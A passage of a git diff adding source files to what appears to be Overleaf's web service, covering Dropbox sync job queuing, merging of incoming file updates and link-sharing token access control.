tpdsWorkerUrl = _.get(settings, ['apis', 'tpdsworker', 'url']) + // silently do nothing if worker url is not in settings + if (!tpdsWorkerUrl) { + return + } + try { + const url = new URL('/enqueue/web_to_tpds_http_requests', tpdsWorkerUrl) + await fetchNothing(url, { + method: 'POST', + json: { group, job, method }, + signal: AbortSignal.timeout(5 * 1000), + }) + } catch (err) { + // log error and continue + logger.error({ err, group, job, method }, 'error enqueueing tpdsworker job') + } +} + +async function getProjectUsersIds(projectId) { + // get list of all user ids with access to project. project owner + // will always be the first entry in the list. 
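+  // Only collaborators with a linked Dropbox account receive TPDS jobs: the
+  // invited-member ids are filtered through a query on
+  // 'dropbox.access_token.uid' below, so everyone else is skipped entirely.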
+ const userIds = await CollaboratorsGetter.getInvitedMemberIds(projectId) + // filter invited users to only return those with dropbox linked + const dropboxUsers = await UserGetter.getUsers( + { + _id: { $in: userIds.map(id => new ObjectId(id)) }, + 'dropbox.access_token.uid': { $ne: null }, + }, + { + _id: 1, + } + ) + const dropboxUserIds = dropboxUsers.map(user => user._id) + return dropboxUserIds +} + +async function moveEntity(params) { + metrics.inc('tpds.move-entity') + const { projectId, rev, entityId, entityType, folderId } = params + + const projectUserIds = await getProjectUsersIds(projectId) + const { endPath, startPath } = buildMovePaths(params) + + for (const userId of projectUserIds) { + const headers = { + 'x-project-id': projectId, + 'x-entity-rev': rev, + } + if (entityId != null) { + headers['x-entity-id'] = entityId + } + if (entityType != null) { + headers['x-entity-type'] = entityType + } + if (folderId != null) { + headers['x-folder-id'] = folderId + } + const job = { + method: 'put', + title: 'moveEntity', + uri: `${tpdsUrl}/user/${userId}/entity`, + headers, + json: { + user_id: userId, + endPath, + startPath, + }, + } + + await enqueue(userId, 'standardHttpRequest', job) + } +} + +async function pollDropboxForUser(userId) { + metrics.inc('tpds.poll-dropbox') + + const job = { + method: 'post', + uri: `${tpdsUrl}/user/poll`, + json: { + user_ids: [userId], + }, + } + + // Queue poll requests in the user queue along with file updates, in order + // to avoid race conditions between polling and updates. + await enqueue(userId, 'standardHttpRequest', job) +} + +const TpdsUpdateSender = { + addDoc: callbackify(addDoc), + addEntity: callbackify(addEntity), + addFile: callbackify(addFile), + deleteEntity: callbackify(deleteEntity), + createProject: callbackify(createProject), + enqueue: callbackify(enqueue), + moveEntity: callbackify(moveEntity), + pollDropboxForUser: callbackify(pollDropboxForUser), + promises: { + addDoc, + addEntity, + addFile, + deleteEntity, + createProject, + enqueue, + moveEntity, + pollDropboxForUser, + }, +} + +module.exports = TpdsUpdateSender diff --git a/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js b/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js new file mode 100644 index 0000000..f68d366 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js @@ -0,0 +1,199 @@ +const { callbackify } = require('util') +const _ = require('lodash') +const fsPromises = require('fs/promises') +const fs = require('fs') +const logger = require('@overleaf/logger') +const EditorController = require('../Editor/EditorController') +const FileTypeManager = require('../Uploads/FileTypeManager') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const crypto = require('crypto') +const Settings = require('@overleaf/settings') +const { pipeline } = require('stream/promises') + +async function mergeUpdate(userId, projectId, path, updateRequest, source) { + const fsPath = await writeUpdateToDisk(projectId, updateRequest) + + try { + // note: important to await here so file reading finishes before cleaning up below + return await _mergeUpdate(userId, projectId, path, fsPath, source) + } finally { + // note: not awaited or thrown + fsPromises.unlink(fsPath).catch(err => { + logger.err({ err, projectId, fsPath }, 'error deleting file') + }) + } +} + +async function writeUpdateToDisk(projectId, updateStream) { + const fsPath = `${ + Settings.path.dumpFolder + 
}/${projectId}_${crypto.randomUUID()}` + const writeStream = fs.createWriteStream(fsPath) + try { + await pipeline(updateStream, writeStream) + } catch (err) { + try { + await fsPromises.unlink(fsPath) + } catch (err) { + logger.error({ err, projectId, fsPath }, 'error deleting file') + } + throw err + } + return fsPath +} + +async function _findExistingFileType(projectId, path) { + const { docs, files } = + await ProjectEntityHandler.promises.getAllEntities(projectId) + if (_.some(docs, d => d.path === path)) { + return 'doc' + } + if (_.some(files, f => f.path === path)) { + return 'file' + } + return null +} + +async function _determineFileType(projectId, path, fsPath) { + // check if there is an existing file with the same path (we either need + // to overwrite it or delete it) + const existingFileType = await _findExistingFileType(projectId, path) + + // determine whether the update should create a doc or binary file + const { binary, encoding } = await FileTypeManager.promises.getType( + path, + fsPath, + existingFileType + ) + + // If we receive a non-utf8 encoding, we won't be able to keep things in + // sync, so we'll treat non-utf8 files as binary + const isBinary = binary || encoding !== 'utf-8' + + // Existing | Update | Resulting file type + // ---------|-----------|-------------------- + // file | isBinary | file + // file | !isBinary | file + // doc | isBinary | file + // doc | !isBinary | doc + // null | isBinary | file + // null | !isBinary | doc + + // if a binary file already exists, always keep it as a binary file + // even if the update looks like a text file + if (existingFileType === 'file') { + return 'file' + } else { + return isBinary ? 'file' : 'doc' + } +} + +async function _mergeUpdate(userId, projectId, path, fsPath, source) { + const fileType = await _determineFileType(projectId, path, fsPath) + + if (fileType === 'file') { + const { file, folder } = await _processFile( + projectId, + fsPath, + path, + source, + userId + ) + return { + projectId, + entityType: 'file', + entityId: file._id, + rev: file.rev, + folderId: folder._id, + } + } else if (fileType === 'doc') { + const { doc, folder } = await _processDoc( + projectId, + userId, + fsPath, + path, + source + ) + return { + projectId, + entityType: 'doc', + entityId: doc._id, + rev: doc.rev, + folderId: folder._id, + } + } else { + throw new Error('unrecognized file') + } +} + +async function deleteUpdate(userId, projectId, path, source) { + try { + return await EditorController.promises.deleteEntityWithPath( + projectId, + path, + source, + userId + ) + } catch (err) { + logger.warn( + { err, userId, projectId, path, source }, + 'failed to delete entity' + ) + } +} + +async function _processDoc(projectId, userId, fsPath, path, source) { + const docLines = await _readFileIntoTextArray(fsPath) + logger.debug({ docLines }, 'processing doc update from tpds') + const doc = await EditorController.promises.upsertDocWithPath( + projectId, + path, + docLines, + source, + userId + ) + return doc +} + +async function _processFile(projectId, fsPath, path, source, userId) { + const { file, folder } = await EditorController.promises.upsertFileWithPath( + projectId, + path, + fsPath, + null, + source, + userId + ) + return { file, folder } +} + +async function _readFileIntoTextArray(path) { + let content = await fsPromises.readFile(path, 'utf8') + if (content == null) { + content = '' + } + const lines = content.split(/\r\n|\n|\r/) + return lines +} + +async function createFolder(projectId, path, userId) { + const { 
lastFolder: folder } = await EditorController.promises.mkdirp( + projectId, + path, + userId + ) + return folder +} + +module.exports = { + mergeUpdate: callbackify(mergeUpdate), + _mergeUpdate: callbackify(_mergeUpdate), + deleteUpdate: callbackify(deleteUpdate), + createFolder: callbackify(createFolder), + promises: { + mergeUpdate, + _mergeUpdate, // called by GitBridgeHandler + deleteUpdate, + createFolder, + }, +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs b/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs new file mode 100644 index 0000000..ff4b93e --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs @@ -0,0 +1,602 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import TokenAccessHandler from './TokenAccessHandler.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import { expressify } from '@overleaf/promise-utils' +import AuthorizationManager from '../Authorization/AuthorizationManager.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import CollaboratorsInviteHandler from '../Collaborators/CollaboratorsInviteHandler.mjs' +import CollaboratorsHandler from '../Collaborators/CollaboratorsHandler.js' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import CollaboratorsGetter from '../Collaborators/CollaboratorsGetter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import AsyncFormHelper from '../Helpers/AsyncFormHelper.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' +import { canRedirectToAdminDomain } from '../Helpers/AdminAuthorizationHelper.js' +import { getSafeAdminDomainRedirect } from '../Helpers/UrlHelper.js' +import UserGetter from '../User/UserGetter.js' +import Settings from '@overleaf/settings' +import LimitationsManager from '../Subscription/LimitationsManager.js' + +const orderedPrivilegeLevels = [ + PrivilegeLevels.NONE, + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.REVIEW, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.OWNER, +] + +async function _userAlreadyHasHigherPrivilege(userId, projectId, tokenType) { + if (!Object.values(TokenAccessHandler.TOKEN_TYPES).includes(tokenType)) { + throw new Error('bad token type') + } + if (!userId) { + return false + } + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, + projectId + ) + return ( + orderedPrivilegeLevels.indexOf(privilegeLevel) >= + orderedPrivilegeLevels.indexOf(tokenType) + ) +} + +const makePostUrl = token => { + if (TokenAccessHandler.isReadAndWriteToken(token)) { + return `/${token}/grant` + } else if (TokenAccessHandler.isReadOnlyToken(token)) { + return `/read/${token}/grant` + } else { + throw new Error('invalid token type') + } +} + +async function _handleV1Project(token, userId) { + if (!userId) { + return { v1Import: { status: 'mustLogin' } } + } else { + const docInfo = await TokenAccessHandler.promises.getV1DocInfo( + token, + userId + ) + // This should not happen anymore, but it does show + // a nice "contact support" message, so it can stay + if (!docInfo) { + return { v1Import: { status: 'cannotImport' } } + } + if (!docInfo.exists) { + return null + } + if (docInfo.exported) { + return null + } + return { + 
v1Import: { + status: 'canDownloadZip', + projectId: token, + hasOwner: docInfo.has_owner, + name: docInfo.name || 'Untitled', + brandInfo: docInfo.brand_info, + }, + } + } +} + +async function _isOverleafStaff(userId) { + const emails = await UserGetter.promises.getUserConfirmedEmails(userId) + const adminDomains = Settings.adminDomains ?? [] + return emails.some(email => + adminDomains.some(adminDomain => email.email.endsWith(`@${adminDomain}`)) + ) +} + +async function tokenAccessPage(req, res, next) { + const { token } = req.params + if (!TokenAccessHandler.isValidToken(token)) { + return next(new Errors.NotFoundError()) + } + + try { + if (TokenAccessHandler.isReadOnlyToken(token)) { + const docPublishedInfo = + await TokenAccessHandler.promises.getV1DocPublishedInfo(token) + if (docPublishedInfo.allow === false) { + return res.redirect(302, docPublishedInfo.published_path) + } + } + + res.render('project/token/access-react', { + postUrl: makePostUrl(token), + }) + } catch (err) { + return next( + OError.tag(err, 'error while rendering token access page', { token }) + ) + } +} + +async function checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next +) { + const isAnonymousUser = !userId + if ( + isAnonymousUser && + tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE && + !TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED + ) { + logger.warn('[TokenAccess] deny anonymous read-and-write token access') + + let projectUrlWithToken = TokenAccessHandler.makeTokenUrl(token) + + if (tokenHashPrefix && tokenHashPrefix.startsWith('#')) { + projectUrlWithToken += `${tokenHashPrefix}` + } + + AuthenticationController.setRedirectInSession(req, projectUrlWithToken) + return [ + null, + () => { + res.json({ + redirect: '/restricted', + anonWriteAccessDenied: true, + }) + }, + { action: 'denied anonymous read-and-write token access' }, + ] + } + + // Try to get the project, and/or an alternative action to take. + // Returns a tuple of [project, action] + const project = await TokenAccessHandler.promises.getProjectByToken( + tokenType, + token + ) + if (!project) { + if (Settings.overleaf) { + const v1ImportData = await _handleV1Project(token, userId) + return [ + null, + () => { + if (v1ImportData) { + res.json(v1ImportData) + } else { + res.sendStatus(404) + } + }, + { action: v1ImportData ? 
'import v1' : '404' },
+      ]
+    } else {
+      return [null, null, { action: '404' }]
+    }
+  }
+
+  const projectId = project._id
+
+  const tokenAccessEnabled =
+    TokenAccessHandler.tokenAccessEnabledForProject(project)
+  if (isAnonymousUser && tokenAccessEnabled) {
+    if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) {
+      if (TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED) {
+        logger.debug({ projectId }, 'granting read-write anonymous access')
+        TokenAccessHandler.grantSessionTokenAccess(req, projectId, token)
+        return [
+          null,
+          () => {
+            res.json({
+              redirect: `/project/${projectId}`,
+              grantAnonymousAccess: tokenType,
+            })
+          },
+          { projectId, action: 'granting read-write anonymous access' },
+        ]
+      } else {
+        // anonymous read-and-write token access should have been denied already
+        throw new Error(
+          'unreachable: anonymous read-and-write token access bug'
+        )
+      }
+    } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) {
+      logger.debug({ projectId }, 'granting read-only anonymous access')
+      TokenAccessHandler.grantSessionTokenAccess(req, projectId, token)
+      return [
+        null,
+        () => {
+          res.json({
+            redirect: `/project/${projectId}`,
+            grantAnonymousAccess: tokenType,
+          })
+        },
+        { projectId, action: 'granting read-only anonymous access' },
+      ]
+    } else {
+      throw new Error('unreachable')
+    }
+  }
+  const userHasPrivilege = await _userAlreadyHasHigherPrivilege(
+    userId,
+    projectId,
+    tokenType
+  )
+  if (userHasPrivilege) {
+    return [
+      null,
+      () => {
+        res.json({ redirect: `/project/${project._id}`, higherAccess: true })
+      },
+      { projectId, action: 'user already has higher or same privilege' },
+    ]
+  }
+
+  // Handle admin redirect
+  // If the project owner is internal staff (using an @overleaf.com email),
+  // the admin will join the project "for real".
+  // If the project owner is an external user,
+  // the admin will be redirected to the admin domain to view the project.
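+  // (As with the other branches above, a redirect outcome is returned as a
+  // [null, action, logData] tuple and the caller invokes action().)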
+ if (canRedirectToAdminDomain(SessionManager.getSessionUser(req.session))) { + const isProjectOwnerOverleafStaff = await _isOverleafStaff( + project.owner_ref + ) + if (isProjectOwnerOverleafStaff) { + logger.warn( + { projectId, userId }, + 'letting admin user join staff project' + ) + } else { + let projectUrlWithToken = TokenAccessHandler.makeTokenUrl(token) + if (tokenHashPrefix && tokenHashPrefix.startsWith('#')) { + projectUrlWithToken += `${tokenHashPrefix}` + } + return [ + null, + () => + res.json({ + redirect: getSafeAdminDomainRedirect(projectUrlWithToken), + }), + { projectId, action: 'redirect admin user to admin domain' }, + ] + } + } + + if (!tokenAccessEnabled) { + return [ + null, + () => { + next(new Errors.NotFoundError()) + }, + { projectId, action: 'token access not enabled' }, + ] + } + return [project, null, { projectId, action: 'continue' }] +} + +async function grantTokenAccessReadAndWrite(req, res, next) { + const { token } = req.params + const { confirmedByUser, tokenHashPrefix } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + if (!TokenAccessHandler.isReadAndWriteToken(token)) { + return res.sendStatus(400) + } + const tokenType = TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + + try { + const [project, action, logData] = await checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next + ) + + TokenAccessHandler.checkTokenHashPrefix( + token, + tokenHashPrefix, + tokenType, + userId, + logData + ) + + if (action) { + return action() + } + if (!project) { + return next(new Errors.NotFoundError()) + } + + if (!confirmedByUser) { + return res.json({ + requireAccept: { + projectName: project.name, + }, + }) + } + + const pendingEditor = + !(await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + )) + await ProjectAuditLogHandler.promises.addEntry( + project._id, + 'accept-via-link-sharing', + userId, + req.ip, + { + privileges: pendingEditor ? 'readOnly' : 'readAndWrite', + ...(pendingEditor && { pendingEditor: true }), + } + ) + AnalyticsManager.recordEventForUserInBackground(userId, 'project-joined', { + role: pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + ownerId: project.owner_ref.toString(), + source: 'link-sharing', + mode: pendingEditor ? 'view' : 'edit', + projectId: project._id.toString(), + ...(pendingEditor && { pendingEditor: true }), + }) + await CollaboratorsHandler.promises.addUserIdToProject( + project._id, + undefined, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + + // remove pending invite and notification + const userEmails = await UserGetter.promises.getUserConfirmedEmails(userId) + await CollaboratorsInviteHandler.promises.revokeInviteForUser( + project._id, + userEmails + ) + // Should be a noop if the user is already a member, + // and would redirect transparently into the project. 
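+    // Notify connected clients so member and invite lists refresh now that
+    // the join (and any invite revocation) has been applied.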
+ EditorRealTimeController.emitToRoom( + project._id, + 'project:membership:changed', + { members: true, invites: true } + ) + + return res.json({ + redirect: `/project/${project._id}`, + }) + } catch (err) { + return next( + OError.tag( + err, + 'error while trying to grant read-and-write token access', + { token } + ) + ) + } +} + +async function grantTokenAccessReadOnly(req, res, next) { + const { token } = req.params + const { confirmedByUser, tokenHashPrefix } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + if (!TokenAccessHandler.isReadOnlyToken(token)) { + return res.sendStatus(400) + } + + const tokenType = TokenAccessHandler.TOKEN_TYPES.READ_ONLY + + const docPublishedInfo = + await TokenAccessHandler.promises.getV1DocPublishedInfo(token) + if (docPublishedInfo.allow === false) { + return res.json({ redirect: docPublishedInfo.published_path }) + } + try { + const [project, action, logData] = await checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next + ) + + TokenAccessHandler.checkTokenHashPrefix( + token, + tokenHashPrefix, + tokenType, + userId, + logData + ) + + if (action) { + return action() + } + if (!project) { + return next(new Errors.NotFoundError()) + } + + if (!confirmedByUser) { + return res.json({ + requireAccept: { + projectName: project.name, + }, + }) + } + + if (!project.tokenAccessReadOnly_refs.some(id => id.equals(userId))) { + await ProjectAuditLogHandler.promises.addEntry( + project._id, + 'join-via-token', + userId, + req.ip, + { privileges: 'readOnly' } + ) + } + + await TokenAccessHandler.promises.addReadOnlyUserToProject( + userId, + project._id, + project.owner_ref + ) + + return res.json({ + redirect: `/project/${project._id}`, + tokenAccessGranted: tokenType, + }) + } catch (err) { + return next( + OError.tag(err, 'error while trying to grant read-only token access', { + token, + }) + ) + } +} + +async function ensureUserCanUseSharingUpdatesConsentPage(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + if (!project) { + throw new Errors.NotFoundError() + } + const isReadWriteTokenMember = + await CollaboratorsGetter.promises.userIsReadWriteTokenMember( + userId, + projectId + ) + if (!isReadWriteTokenMember) { + // If the user is not a read write token member, there are no actions to take + return AsyncFormHelper.redirect(req, res, `/project/${projectId}`) + } + const isReadWriteMember = + await CollaboratorsGetter.promises.isUserInvitedReadWriteMemberOfProject( + userId, + projectId + ) + if (isReadWriteMember) { + // If the user is already an invited editor, the actions don't make sense + return AsyncFormHelper.redirect(req, res, `/project/${projectId}`) + } + next() +} + +async function sharingUpdatesConsent(req, res, next) { + const { Project_id: projectId } = req.params + AnalyticsManager.recordEventForSession(req.session, 'notification-prompt', { + page: req.path, + name: 'link-sharing-collaborator', + }) + res.render('project/token/sharing-updates', { + projectId, + }) +} + +async function moveReadWriteToCollaborators(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + const project = await ProjectGetter.promises.getProject(projectId, { + owner_ref: 1, + }) + const isInvitedMember = + await 
CollaboratorsGetter.promises.isUserInvitedMemberOfProject( + userId, + projectId + ) + const pendingEditor = + !(await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + )) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'accept-via-link-sharing', + userId, + req.ip, + { + privileges: pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + tokenMember: true, + invitedMember: isInvitedMember, + ...(pendingEditor && { pendingEditor: true }), + } + ) + if (isInvitedMember) { + // Read only invited viewer who is gaining edit access via link sharing + await TokenAccessHandler.promises.removeReadAndWriteUserFromProject( + userId, + projectId + ) + await CollaboratorsHandler.promises.setCollaboratorPrivilegeLevel( + projectId, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + } else { + // Normal case, not invited, joining via link sharing + await TokenAccessHandler.promises.removeReadAndWriteUserFromProject( + userId, + projectId + ) + await CollaboratorsHandler.promises.addUserIdToProject( + projectId, + undefined, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + } + EditorRealTimeController.emitToRoom(projectId, 'project:membership:changed', { + members: true, + }) + res.sendStatus(204) +} + +async function moveReadWriteToReadOnly(req, res, next) { + const { Project_id: projectId } = req.params + const userId = SessionManager.getLoggedInUserId(req.session) + await ProjectAuditLogHandler.promises.addEntry( + projectId, + 'readonly-via-sharing-updates', + userId, + req.ip + ) + await TokenAccessHandler.promises.moveReadAndWriteUserToReadOnly( + userId, + projectId + ) + res.sendStatus(204) +} + +export default { + READ_ONLY_TOKEN_PATTERN: TokenAccessHandler.READ_ONLY_TOKEN_PATTERN, + READ_AND_WRITE_TOKEN_PATTERN: TokenAccessHandler.READ_AND_WRITE_TOKEN_PATTERN, + + tokenAccessPage: expressify(tokenAccessPage), + grantTokenAccessReadOnly: expressify(grantTokenAccessReadOnly), + grantTokenAccessReadAndWrite: expressify(grantTokenAccessReadAndWrite), + ensureUserCanUseSharingUpdatesConsentPage: expressify( + ensureUserCanUseSharingUpdatesConsentPage + ), + sharingUpdatesConsent: expressify(sharingUpdatesConsent), + moveReadWriteToCollaborators: expressify(moveReadWriteToCollaborators), + moveReadWriteToReadOnly: expressify(moveReadWriteToReadOnly), +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js b/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js new file mode 100644 index 0000000..0d08903 --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessHandler.js @@ -0,0 +1,362 @@ +const { Project } = require('../../models/Project') +const PublicAccessLevels = require('../Authorization/PublicAccessLevels') +const PrivilegeLevels = require('../Authorization/PrivilegeLevels') +const { ObjectId } = require('mongodb-legacy') +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const V1Api = require('../V1/V1Api') +const crypto = require('crypto') +const { callbackifyAll } = require('@overleaf/promise-utils') +const Analytics = require('../Analytics/AnalyticsManager') + +const READ_AND_WRITE_TOKEN_PATTERN = '([0-9]+[a-z]{6,12})' +const READ_ONLY_TOKEN_PATTERN = '([a-z]{12})' + +const TokenAccessHandler = { + TOKEN_TYPES: { + READ_ONLY: PrivilegeLevels.READ_ONLY, 
+ READ_AND_WRITE: PrivilegeLevels.READ_AND_WRITE, + }, + + ANONYMOUS_READ_AND_WRITE_ENABLED: + Settings.allowAnonymousReadAndWriteSharing === true, + + READ_AND_WRITE_TOKEN_PATTERN, + READ_ONLY_TOKEN_PATTERN, + + _makeReadAndWriteTokenUrl(token) { + return `/${token}` + }, + + _makeReadOnlyTokenUrl(token) { + return `/read/${token}` + }, + + makeTokenUrl(token) { + const tokenType = TokenAccessHandler.getTokenType(token) + if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) { + return TokenAccessHandler._makeReadAndWriteTokenUrl(token) + } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) { + return TokenAccessHandler._makeReadOnlyTokenUrl(token) + } else { + throw new Error('invalid token type') + } + }, + + getTokenType(token) { + if (!token) { + return null + } + if (token.match(`^${TokenAccessHandler.READ_ONLY_TOKEN_PATTERN}$`)) { + return TokenAccessHandler.TOKEN_TYPES.READ_ONLY + } else if ( + token.match(`^${TokenAccessHandler.READ_AND_WRITE_TOKEN_PATTERN}$`) + ) { + return TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + } + return null + }, + + isReadOnlyToken(token) { + return ( + TokenAccessHandler.getTokenType(token) === + TokenAccessHandler.TOKEN_TYPES.READ_ONLY + ) + }, + + isReadAndWriteToken(token) { + return ( + TokenAccessHandler.getTokenType(token) === + TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + ) + }, + + isValidToken(token) { + return TokenAccessHandler.getTokenType(token) != null + }, + + tokenAccessEnabledForProject(project) { + return project.publicAccesLevel === PublicAccessLevels.TOKEN_BASED + }, + + async _projectFindOne(query) { + return await Project.findOne(query, { + _id: 1, + tokens: 1, + publicAccesLevel: 1, + owner_ref: 1, + name: 1, + tokenAccessReadOnly_refs: 1, + tokenAccessReadAndWrite_refs: 1, + }).exec() + }, + + async getProjectByReadOnlyToken(token) { + return await TokenAccessHandler._projectFindOne({ + 'tokens.readOnly': token, + }) + }, + + _extractNumericPrefix(token) { + return token.match(/^(\d+)\w+/) + }, + + _extractStringSuffix(token) { + return token.match(/^\d+(\w+)/) + }, + + async getProjectByReadAndWriteToken(token) { + const numericPrefixMatch = TokenAccessHandler._extractNumericPrefix(token) + if (!numericPrefixMatch) { + return null + } + const numerics = numericPrefixMatch[1] + + const project = await TokenAccessHandler._projectFindOne({ + 'tokens.readAndWritePrefix': numerics, + }) + + if (project == null) { + return null + } + + try { + if ( + !crypto.timingSafeEqual( + Buffer.from(token), + Buffer.from(project.tokens.readAndWrite) + ) + ) { + logger.err( + { projectId: project._id }, + 'read-and-write token match on numeric section, but not on full token' + ) + return null + } else { + return project + } + } catch (error) { + logger.err({ projectId: project._id, error }, 'error comparing tokens') + return null + } + }, + + async getProjectByToken(tokenType, token) { + if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) { + return await TokenAccessHandler.getProjectByReadOnlyToken(token) + } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) { + return await TokenAccessHandler.getProjectByReadAndWriteToken(token) + } + throw new Error('invalid token type') + }, + + async addReadOnlyUserToProject(userId, projectId, ownerId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + Analytics.recordEventForUserInBackground(userId, 'project-joined', { + role: PrivilegeLevels.READ_ONLY, + projectId: projectId.toString(), + source: 
'link-sharing', + ownerId: ownerId.toString(), + mode: 'view', + }) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $addToSet: { tokenAccessReadOnly_refs: userId }, + } + ).exec() + }, + + async removeReadAndWriteUserFromProject(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $pull: { tokenAccessReadAndWrite_refs: userId }, + } + ).exec() + }, + + async moveReadAndWriteUserToReadOnly(userId, projectId) { + userId = new ObjectId(userId.toString()) + projectId = new ObjectId(projectId.toString()) + + return await Project.updateOne( + { + _id: projectId, + }, + { + $pull: { tokenAccessReadAndWrite_refs: userId }, + $addToSet: { tokenAccessReadOnly_refs: userId }, + } + ).exec() + }, + + grantSessionTokenAccess(req, projectId, token) { + if (!req.session) { + return + } + if (!req.session.anonTokenAccess) { + req.session.anonTokenAccess = {} + } + req.session.anonTokenAccess[projectId.toString()] = token + }, + + getRequestToken(req, projectId) { + const token = + req.session && + req.session.anonTokenAccess && + req.session.anonTokenAccess[projectId.toString()] + return token + }, + + async validateTokenForAnonymousAccess(projectId, token, callback) { + if (!token) { + return { isValidReadAndWrite: false, isValidReadOnly: false } + } + + const tokenType = TokenAccessHandler.getTokenType(token) + if (!tokenType) { + throw new Error('invalid token type') + } + + const project = await TokenAccessHandler.getProjectByToken(tokenType, token) + + if ( + !project || + !TokenAccessHandler.tokenAccessEnabledForProject(project) || + project._id.toString() !== projectId.toString() + ) { + return { isValidReadAndWrite: false, isValidReadOnly: false } + } + + // TODO: think about cleaning up this interface and its usage in AuthorizationManager + return { + isValidReadAndWrite: + tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE && + TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED, + isValidReadOnly: tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY, + } + }, + + async getV1DocPublishedInfo(token) { + // default to allowing access + if (!Settings.apis.v1 || !Settings.apis.v1.url) { + return { allow: true } + } + + const { body } = await V1Api.promises.request({ + url: `/api/v1/overleaf/docs/${token}/is_published`, + }) + return body + }, + + async getV1DocInfo(token, v2UserId) { + if (!Settings.apis || !Settings.apis.v1) { + return { + exists: true, + exported: false, + } + } + + const v1Url = `/api/v1/overleaf/docs/${token}/info` + const { body } = await V1Api.promises.request({ url: v1Url }) + return body + }, + + createTokenHashPrefix(token) { + const hash = crypto.createHash('sha256') + hash.update(token) + return hash.digest('hex').slice(0, 6) + }, + + normalizeTokenHashPrefix(tokenHashPrefix) { + if (typeof tokenHashPrefix !== 'string') return '' + // remove (encoded) hash + tokenHashPrefix = tokenHashPrefix.replace('#', '').replace('%23', '') + // remove trailing special characters that were copied by accident + tokenHashPrefix = tokenHashPrefix.replace(/[^a-z0-9]+$/i, '') + return tokenHashPrefix + }, + + checkTokenHashPrefix(token, tokenHashPrefix, type, userId, logData = {}) { + let hashPrefixStatus + + tokenHashPrefix = + TokenAccessHandler.normalizeTokenHashPrefix(tokenHashPrefix) + + const v1Format = /%2F[0-9]{7,8}%2F/ + const isSuspectedV1Format = v1Format.test(tokenHashPrefix) + + if (!tokenHashPrefix) { + 
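+      // nothing to compare: the client sent no prefix (e.g. the '#' fragment
+      // was lost when the link was copied or pasted)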
